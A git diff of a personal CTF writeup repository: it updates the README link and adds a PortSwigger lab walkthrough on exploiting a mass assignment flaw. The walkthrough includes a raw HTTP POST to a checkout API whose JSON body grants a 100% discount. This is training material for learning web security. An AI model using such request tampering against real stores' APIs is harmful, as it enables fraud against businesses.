diff --git a/README.md b/README.md
index e58c56b..fd7ef04 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 A repository to collect my writeups and notes on CTF challenges I did.
 
 
-https://sirius-a.github.io/ctf-writeups/
+https://ctf.zuberfab.io/
 
 
 ## Getting Started
diff --git a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
index 7c8db90..3a1cf07 100644
--- a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
+++ b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
@@ -17,4 +17,15 @@ Content-Length: 12
 
 ## Exploiting a mass assignment vulnerability
 
+It is possible to send a `POST` request to the `checkout` endpoint with 100% 
+discount.
 
+```
+POST /api/checkout HTTP/2
+Host: 0af0002804d0d47e86ff4f3200e200aa.web-security-academy.net
+Cookie: session=42Y5LbakIMHg3C8i7egh1Kt9P1E6UWD9
+Content-Type: application/json;charset=UTF-8
+[...]
+
+{"chosen_discount":{"percentage": 100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]}
+```